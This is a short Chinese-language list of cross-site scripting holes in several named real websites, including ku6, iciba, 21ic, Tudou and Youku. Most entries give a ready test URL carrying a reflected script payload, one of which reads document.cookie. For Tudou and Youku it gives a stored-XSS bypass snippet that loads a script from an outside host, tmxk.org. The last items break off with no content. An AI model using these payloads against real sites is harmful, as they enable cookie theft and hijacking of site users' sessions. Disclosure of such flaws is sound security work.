1.酷6非持久XSS:
测试地址:http://boke.ku6.com/18543574?mode=2&view=1&keywords=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
2.必途网:
测试地址:http://search.b2b.cn/product/?k=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
3.金山爱词霸:
非持久性:http://www.iciba.com/search?s=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
同时存在持久型XSS
4.21IC.com 中国电子网:
测试地址:http://search.21ic.com/so.php?keyword=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
5.中华电源网:
测试地址:http://www.power-cn.cn/sample/search.asp?txtitle=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
6.优酷+土豆XSS:
土豆没有做服务端过滤,导致了存储型XSS。
1>. 绕过代码:
</textarea><script src=http://tmxk.org/m/q.js></script>
2>. 土豆播客因编辑器原因可插入代码:
3>. 优酷有同样的毛病: